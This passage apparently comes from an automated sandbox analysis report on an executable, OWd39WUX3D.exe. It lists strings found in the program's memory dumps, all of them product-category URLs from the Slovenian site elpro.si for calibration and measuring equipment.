00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracije/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kalibracijski-instrument
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kovcki-za-merilno-opremo
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/krmilne-elektro-omarice/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/alarmne-in-napajalne-enote/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/dodatna-oprema-inor/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/izolatorji-signalov-in-izolacijski-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/temperaturni-merilni-pretvorniki/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/terenska-ohisja-in-prikazovalniki/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kapa
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kond
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/plav
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/filmski-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/regulato
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/koncna-in-magnetna-stikal
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev
